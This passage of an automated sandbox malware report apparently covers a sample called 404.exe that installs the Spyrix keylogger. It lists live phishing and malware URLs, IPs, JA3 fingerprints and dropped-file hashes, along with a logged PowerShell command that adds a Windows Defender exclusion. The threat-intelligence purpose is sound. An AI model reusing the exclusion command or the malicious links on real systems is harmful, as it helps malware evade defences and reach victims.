	https://workdrive.zoho.com/file/s8yrwa67a53974b474ef79eb70d1033b872c5	Get hash	malicious	HTMLPhisher	Browse	23.109.93.100
	https://filedn.com/lt87R94Oi7NbcQdmzW2xPrR/link.html	Get hash	malicious	HTMLPhisher	Browse	23.109.93.100
	https://www.msn.com/en-ca/lifestyle/rf-buying-guides/redirect?rf_click_source=list&rf_client_click_id=000000000&rf_dws_location=&rf_item_id=502238318&rf_list_id=3519472&rf_partner_id=353781453390&rf_source=ebay&url=aHR0cHM6Ly9maWxlZG4uY29tL2x0Q1JsWTNpVGNkN2RjM3UyUm1KdWFTL2xpbmsuaHRtbA	Get hash	malicious	HTMLPhisher	Browse	23.109.93.100
spyrix.net	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse	158.69.117.119
spyrix.net	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse	158.69.117.119
cl-e0469d03.edgecdn.ru	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse	95.181.182.182
cl-e0469d03.edgecdn.ru	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse	95.181.182.182
dashboard.spyrix.com	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse	158.69.117.119
dashboard.spyrix.com	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse	158.69.117.119

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OVHFR	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse	167.114.14.170
	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse	167.114.14.170
	s14.bat	Get hash	malicious	Unknown	Browse	167.114.14.170
	s200.bat	Get hash	malicious	Unknown	Browse	167.114.14.170
	2Efe8RQhvR.vbs	Get hash	malicious	PureLog Stealer	Browse	91.134.98.142
	http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630	Get hash	malicious	Unknown	Browse	51.195.5.58
	https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jg	Get hash	malicious	HTMLPhisher	Browse	51.68.39.188
	OXrZ6fj4Hq.exe	Get hash	malicious	Neshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWorm	Browse	51.255.119.242
	moba-24.2-installer_M64ZB-1.exe	Get hash	malicious	PureLog Stealer	Browse	178.32.197.57
OVHFR	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse	167.114.14.170
	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse	167.114.14.170
	s14.bat	Get hash	malicious	Unknown	Browse	167.114.14.170
	s200.bat	Get hash	malicious	Unknown	Browse	167.114.14.170
	2Efe8RQhvR.vbs	Get hash	malicious	PureLog Stealer	Browse	91.134.98.142
	http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630	Get hash	malicious	Unknown	Browse	51.195.5.58
	https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jg	Get hash	malicious	HTMLPhisher	Browse	51.68.39.188
	OXrZ6fj4Hq.exe	Get hash	malicious	Neshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWorm	Browse	51.255.119.242
	moba-24.2-installer_M64ZB-1.exe	Get hash	malicious	PureLog Stealer	Browse	178.32.197.57
OVHFR	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse	167.114.14.170
	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse	167.114.14.170
	s14.bat	Get hash	malicious	Unknown	Browse	167.114.14.170
	s200.bat	Get hash	malicious	Unknown	Browse	167.114.14.170
	2Efe8RQhvR.vbs	Get hash	malicious	PureLog Stealer	Browse	91.134.98.142
	http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630	Get hash	malicious	Unknown	Browse	51.195.5.58
	https://www.evernote.com/shard/s683/sh/202c4f3c-3650-93fd-8370-eaca4fc7cbbc/9PDECUYIIdOn7uDMCJfJSDfeqawh-oxMdulb3egg-jZJLZIoB686GWk5jg	Get hash	malicious	HTMLPhisher	Browse	51.68.39.188
	OXrZ6fj4Hq.exe	Get hash	malicious	Neshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWorm	Browse	51.255.119.242
	moba-24.2-installer_M64ZB-1.exe	Get hash	malicious	PureLog Stealer	Browse	178.32.197.57

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse	13.85.23.86 184.28.90.27 20.114.59.183
	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse	13.85.23.86 184.28.90.27 20.114.59.183
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.85.23.86 184.28.90.27 20.114.59.183
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.85.23.86 184.28.90.27 20.114.59.183
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.85.23.86 184.28.90.27 20.114.59.183
	http://loglnmicrosoftonl365.Globalfoundries.vitoriorefrigeracao.com.br/excel/active/test@globalfoundries.com	Get hash	malicious	Unknown	Browse	13.85.23.86 184.28.90.27 20.114.59.183
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.85.23.86 184.28.90.27 20.114.59.183
	https://unpaidrefund.top/view/mygov	Get hash	malicious	HTMLPhisher	Browse	13.85.23.86 184.28.90.27 20.114.59.183
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.85.23.86 184.28.90.27 20.114.59.183
74954a0c86284d0d6e1c4efefe92b521	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse	167.114.14.170 167.114.14.168
	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse	167.114.14.170 167.114.14.168
	s14.bat	Get hash	malicious	Unknown	Browse	167.114.14.170 167.114.14.168
	s200.bat	Get hash	malicious	Unknown	Browse	167.114.14.170 167.114.14.168
	KYwOaWhyl6.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	167.114.14.170 167.114.14.168
	HdXeCzyZD9.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	167.114.14.170 167.114.14.168
	NCTSgL4t0B.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	167.114.14.170 167.114.14.168
	TJWbSGBK0I.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	167.114.14.170 167.114.14.168
	4tXm5yPtiy.exe	Get hash	malicious	LummaC, DCRat, LummaC Stealer, PureLog Stealer, zgRAT	Browse	167.114.14.170 167.114.14.168
3b5074b1b5d032e5620f69f9f700ff0e	Scan_doc_09_16_24_1203.exe	Get hash	malicious	ScreenConnect Tool	Browse	23.109.93.100
	E_BILL0041272508.exe	Get hash	malicious	ScreenConnect Tool	Browse	23.109.93.100
	Scan_doc_09_16_24_1120.exe	Get hash	malicious	ScreenConnect Tool	Browse	23.109.93.100
	E_BILL9926378035.exe	Get hash	malicious	ScreenConnect Tool	Browse	23.109.93.100
	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse	23.109.93.100
	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse	23.109.93.100
	Scan_doc_09_16_24_1203.exe	Get hash	malicious	ScreenConnect Tool	Browse	23.109.93.100
	E_BILL0041272508.exe	Get hash	malicious	ScreenConnect Tool	Browse	23.109.93.100
	jD1RqkyUNm.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	23.109.93.100

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse
	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse

Process:	C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	457728
Entropy (8bit):	6.59955980299879
Encrypted:	false
SSDEEP:	12288:oYP3U+DowYPZOobyfwOgM2evuRTQ8r5e:3knwGZO4ZBevgTQ
MD5:	5E952525D9379E001F1714DE9E87B50D
SHA1:	45A1F15E62D3BEBF80BFDE69B992448DA09369FA
SHA-256:	81DE9F4EE9164358163C7F2200522E5C518D649ED6868CC6F27DB2B831F42DA4
SHA-512:	FCCEFD5CEFA59AAE1CCF1DF61907720BFB753AA1A6094DCB9225BA0110172103980C77708B9BB36F9D329B890ECC3F279AEE325A780308E9AC127EDC99CF8D0D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: D0WmCTD2qO.bat, Detection: malicious, Browse Filename: c5WMpr1cOc.bat, Detection: malicious, Browse
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B..................................... ....@..............................................................................(...0...L.......................e......................................................\............................text............................... ..`.itext.............................. ..`.data...T.... ......................@....bss.....5...@...........................idata...(.........................@....edata...............H..............@..@.reloc...e.......f...J..............@..B.rsrc....L...0...L..................@..@....................................@..@........................................................................................................................................

Process:	C:\Windows\SysWOW64\regedit.exe
File Type:	Windows Registry little-endian text (Win2K or above)
Category:	dropped
Size (bytes):	2094
Entropy (8bit):	3.7428199944490896
Encrypted:	false
SSDEEP:	48:tKleUhKVfcfSOMokHSOMSd2gianNHMSOMadjHMSOMadvAcdqcTc20rIO:Sh0UKTyVgiaNJCjJCvzdNoNIO
MD5:	46C57123EA845B9C434E3780790BF1D9
SHA1:	67D34740AF9F23D412DFCEAA0C3B3C47FAB7246F
SHA-256:	ACD9E07556289AB118D4B6B23D704F2E98FCE1852020B536FFD8CDBFEB656222
SHA-512:	1B2CFF63B4691DAFD83A321B0A41185B10352FF31B1DCF0493A6BBC2DDED2DE89221CB049D723E29C1E9DA2077459FD557C173CF840D9D8CE147223CD31F36CC
Malicious:	true
Reputation:	unknown
Preview:	..W.i.n.d.o.w.s. .R.e.g.i.s.t.r.y. .E.d.i.t.o.r. .V.e.r.s.i.o.n. .5...0.0.........[.H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.\.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.C.u.r.r.e.n.t.V.e.r.s.i.o.n.\.U.n.i.n.s.t.a.l.l.\.S.p.y.r.i.x. .F.r.e.e. .K.e.y.l.o.g.g.e.r._.i.s.1.].....".I.n.n.o. .S.e.t.u.p.:. .S.e.t.u.p. .V.e.r.s.i.o.n.".=.".5...5...9. .(.u.).".....".I.n.n.o. .S.e.t.u.p.:. .A.p.p. .P.a.t.h.".=.".C.:.\.\.P.r.o.g.r.a.m.D.a.t.a.\.\.S.e.c.u.r.i.t.y. .M.o.n.i.t.o.r.\.\.{.8.2.7.D.2.1.C.C.-.A.2.2.D.-.4.5.D.6.-.2.3.C.A.-.4.5.1.D.D.A.C.7.6.9.B.A.}.".....".I.n.s.t.a.l.l.L.o.c.a.t.i.o.n.".=.".C.:.\.\.P.r.o.g.r.a.m.D.a.t.a.\.\.S.e.c.u.r.i.t.y. .M.o.n.i.t.o.r.\.\.{.8.2.7.D.2.1.C.C.-.A.2.2.D.-.4.5.D.6.-.2.3.C.A.-.4.5.1.D.D.A.C.7.6.9.B.A.}.\.\.".....".I.n.n.o. .S.e.t.u.p.:. .I.c.o.n. .G.r.o.u.p.".=.".S.p.y.r.i.x. .F.r.e.e. .K.e.y.l.o.g.g.e.r.".....".I.n.n.o. .S.e.t.u.p.:. .U.s.e.r.".=.".f.r.o.n.t.d.e.s.k.".....".I.n.n.o. .S.e.t.u.p.:. .L.a.n.g.u.a.g.e.".=.".e.n.g.l.i.s.h.".....".D.i.s.p.

Process:	C:\Users\user\Desktop\404.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.345080863654519
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
MD5:	88593431AEF401417595E7A00FE86E5F
SHA1:	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
SHA-256:	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
SHA-512:	1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

Process:	C:\Windows\System32\reg.exe
File Type:	Windows Registry little-endian text (Win2K or above)
Category:	dropped
Size (bytes):	236
Entropy (8bit):	3.6440699182134826
Encrypted:	false
SSDEEP:	6:Qyk+SkWCiiCRroZ6IJlUAG+DZKHWn+SkUkDkqOEcRKw:Qy5hVZteAxDZaW+oVd3
MD5:	0A7F333C72BA23F66948D2F7ACAF391E
SHA1:	4E232F923162508127336631C7A734982795FC6F
SHA-256:	C0E694FE96F168B2E1C2C6710E2DA625849F72A5260AC6F8AFD7B399B82C7026
SHA-512:	E770D89B07783F9EDBD8F13D0D369CB3CF59BD666BDEA34276EB29FB8334A413A3F8159C9FD235CF9710937EE29838AA0665EC4CDC3B03204AE353B2EF1F2A91
Malicious:	false
Reputation:	unknown
Preview:	..W.i.n.d.o.w.s. .R.e.g.i.s.t.r.y. .E.d.i.t.o.r. .V.e.r.s.i.o.n. .5...0.0.........[.H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.\.S.O.F.T.W.A.R.E.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.E.x.c.l.u.s.i.o.n.s.\.P.a.t.h.s.].........

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	unknown
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Process:	C:\Windows\SysWOW64\curl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	33441448
Entropy (8bit):	7.998895110211762
Encrypted:	true
SSDEEP:	786432:sEKNHXUy8paSpU5Nqs6QWYTYAUgde09g6i53G+wSl:NE3ULMSkQs6vXBPzRG+wg
MD5:	0F335D8996D82DA30FE9286C671FA0CD
SHA1:	FF64FF5AB0FF7C848809D5A82B2F6248B38F8FA5
SHA-256:	10DED982BDF7EF7F33FD417C7D818D131B7C73CBF6E955BBE04FBA656B37FED7
SHA-512:	12BD786BB93856D09826AB5D612FB3213CF8F6EC0C0240C27A0CDC510D56F4F4089636736D1A168463A6AC824E7B2ACE2611E6A5E8E0138C490B534662B54600
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W.....................p............... ....@..................................3....@......@.......................................O...........%...!...........................................................................................text...D........................... ..`.itext..d........................... ..`.data........ ......................@....bss.....V...0...........................idata..............................@....tls.................&...................rdata...............&..............@..@.rsrc....O.......P...(..............@..@....................................@..@........................................................................................................................................

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	11
Entropy (8bit):	3.095795255000934
Encrypted:	false
SSDEEP:	3:nWDn:nWD
MD5:	285130BE63E78277DF11A9108B363925
SHA1:	92DD2F701821CACA090F8058BD054E840FFF88CC
SHA-256:	CFAEB467D2A24A24D97D2E8267E68E6D7C6C805D928DA760D6706AA20608FF5F
SHA-512:	30755D1EC6BEF8B943100F321489ABBE09306817099623DE7916EC2F1CB9CCD191EBD8939352DAC6207AEB95963A30690452037C808FC165DB12C54099377BAC
Malicious:	false
Reputation:	unknown
Preview:	sfkstart ..

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	917
Entropy (8bit):	4.884815574267147
Encrypted:	false
SSDEEP:	24:nt0vG74xdl/ko+3bdhXUnt0oxdl/ko+3bdhXUn:nt2H+3EntTH+3En
MD5:	6F2313763C1AD9F789FF3A343AD82AA1
SHA1:	8FD79A4E381A7BC0ABBCCF8DE00BA25655CCB029
SHA-256:	39EBF0A3E52E0D2EF8627338D9605F77A2D46B5B324B1E3CAB19CB6DDB43B4AB
SHA-512:	CE53871C80BFC858678553EBA88AC3B79A565F4C3F401ECA9EEB2B37CF0F3FC3CB12ED300B0B31EBAB968E79A0D40785B6CF38F9D4D687677D8CA88E0A2049E2
Malicious:	false
Reputation:	unknown
Preview:	add-mpPreference : Operation failed with the following error: 0x800106ba. Operation: MpPreference. Target: .ConfigListExtension..At line:1 char:1.+ add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'.+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .add-mpPreference : Operation failed with the following error: 0x%1!x!.At line:1 char:1.+ add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'.+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], . CimException. + FullyQualifiedErrorId : HRESULT 0x800106ba,Add-MpPreference. .

Process:	C:\Users\user\AppData\Local\Temp\d55b5edc-beb4-4418-b1de-2b3817e31a87\404.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	1286144
Entropy (8bit):	6.249712908749164
Encrypted:	false
SSDEEP:	24576:EtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFt54DTx9Ke:8qTytRFk6ek14h5
MD5:	BFA3F09DEEE00832D000F497EC5B570A
SHA1:	9D4ED9BB876E66258392AA51C9B1C0F67D38A6AE
SHA-256:	F01CFA202969C9FE931CB95E47FF59700F9EB924014ED349E0A731B3B7327518
SHA-512:	A89043F52655EB0E189A5A1F5D72BF049A855D1795D0FA0E66EA949FC6F20A5336154D4A3FC2F3480E132751963C6AF2A68806623EF0651D8CC513BE7E1DCE70
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......W............................l........ ....@..........................p............@......@..............................@8...0...2................................................... .......................................................text............................... ..`.itext.............................. ..`.data...h0... ...2..................@....bss.....a...`.......0...................idata..@8.......:...0..............@....tls....<............j...................rdata....... .......j..............@..@.rsrc....2...0...4...l..............@..@....................................@..@........................................................................................................................................

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from Unix, original size modulo 2^32 27077
Category:	downloaded
Size (bytes):	7285
Entropy (8bit):	7.964038684015041
Encrypted:	false
SSDEEP:	192:TvxMGwo9hFNrNNXizl2Bcj94aps9y5aW2CHkz92mDXnjrVo75OKc:7aboh57AL94ly592CmFXidJc
MD5:	F687E94F4D455BA119D2187B14A884AE
SHA1:	5206BDA3E1959F6A7369D33171F9AF76F92C21E2
SHA-256:	5D18275C9AC22E917CEA324C250F54D9F6A1899BAB0EFBDF3739A6AB181BE5A3
SHA-512:	1EA801D2E9BD5C4A3FAD19776270D971A159B28B52AF0369D208D6FFC0A5F81BF0CD8B8CA2379B1C75E366694DBE4B1ED1C7CBB78137F61829A8AC38B54D93CA
Malicious:	false
Reputation:	unknown
URL:	https://cdn.cdndownload.net/dashboard30/assets/en-08b2a987.js
Preview:	............n.V...Sp..v.ka....!..$.;..%.......6...,.J....'....{I.".K.v:."......fM..Iq..\....S...O..k......../....}...\|......O]}.>.O.6u.a...GK..UE.3..usF..az.m...0.]...&o.[../..Y.L...i...0..U...0....M[.RwBy...8...Orq.>+..H..o:....o.f}t.>lRw...).O....J.3?o.f..jrfu.0mX.K:m....U_..zN.M.([f.#{PWeM.w.\,...V..^...m.q..6u..../O..w..Y...{x.~QVV..w}.}x5\|..q........v..a...J...H...I...~..o..5....._.......G.'.{.=k.F......>...\|..}..T....6....e..TX..K......,g[.S.r..l..\|."..O...-...G...i....`.XhN.....sIb..u...2k..K.i.WW....T.u.7,`.w..R.g.H.\Y.i.G....f.Z...mE...\.}...C>..ZgW.,..E....:gSR...N....,.8.).YV...nU..l;.M."18(...y...d..n.lV..[n.:............p.E[$..:..u.(.y..6.K.ErvR... Yy.....v..f.%..m%I.,....~..]z..W.l.$.E.Y3.L..@.J.:O.4....'S5..Kj....@W..,...N^..}.n....DLz..l....v...J3JJ..o.Q...^R8mY....&..[..<s..7a.Y.<c.r7.xV.N/.WE2...Vo$ci..Z..!../.b_.&.-N.en..7.\|s...#.<.3.\....?.nY..;OVy.gxa....6....zy.t.j..;..V.K.?....m..o...X6.CI

Process:	C:\Windows\SysWOW64\reg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	243
Entropy (8bit):	5.025903567998292
Encrypted:	false
SSDEEP:	6:rbsd3u6eWFF60OckSi23oH+H1gFyeWFF60OckSi23fksgeWFF60OckSi23fhn:QNFFvO4ZYeVAyNFFvO4ZssgNFFvO4ZZn
MD5:	5F73D6EB745036C1AFF17E55835C42B2
SHA1:	603662F0180E4B5AACD9DCDFB01738C0D29F7A3F
SHA-256:	11C4731706427EC108A02F9FD527EC7DEEA25F012233B5F6EEC8D10F615CB631
SHA-512:	E9B3B307A6CBC6EE6219347ED24246AFE1197CEE2A1AC621C7E8035DD32B9CAB256F80155D66E7580AFEE7022264CEE105EE08A380BE5960C30E26D3E2277E43
Malicious:	false
Reputation:	unknown
Preview:	..HKEY_USERS\S-1-5-19\Environment.. Path REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;.. TEMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp.. TMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp....

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.725524916177281
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	404.exe
File size:	90'112 bytes
MD5:	d15daef371b50fb739401bfde29df35a
SHA1:	d916c598aff72aaf461a5427cd7c6440c199ff24
SHA256:	ee8a52deddf45bac9caa60205f83488ee644ffd1ea01998774d68c7f46568b71
SHA512:	4145f4a52d7098b5543efefdbf2810b403ba82036f2ef254f458d0084da839636f9d4dc5ec3016065fdfccf6468da301c4da523ece1244fd23efb1fd288d5529
SSDEEP:	1536:Fmb6bAx1Aw+M+JqPSMr49ucL+91yhgwCqnkLrcIN6mE:Fm+b/zqPSMr49uiSUf
TLSH:	D193F1603BF9871BD2785E3859F67B0147B6AE166906DF8E1DC8B05F6DB371402C2A23
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...W->..........."...0..P.........."n... ........@.. ....................................`................................

Entrypoint:	0x416e22
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xFC3E2D57 [Fri Feb 8 17:01:11 2104 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x16dd0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x18000	0xaa0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x16db4	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x14e28	0x15000	a135ff2cca68dc8c711f24903f640245	False	0.922119140625	data	7.81759162350406	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x18000	0xaa0	0xc00	df25321e9d65b54051c62a01523d6a24	False	0.3551432291666667	data	4.219239603448153	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
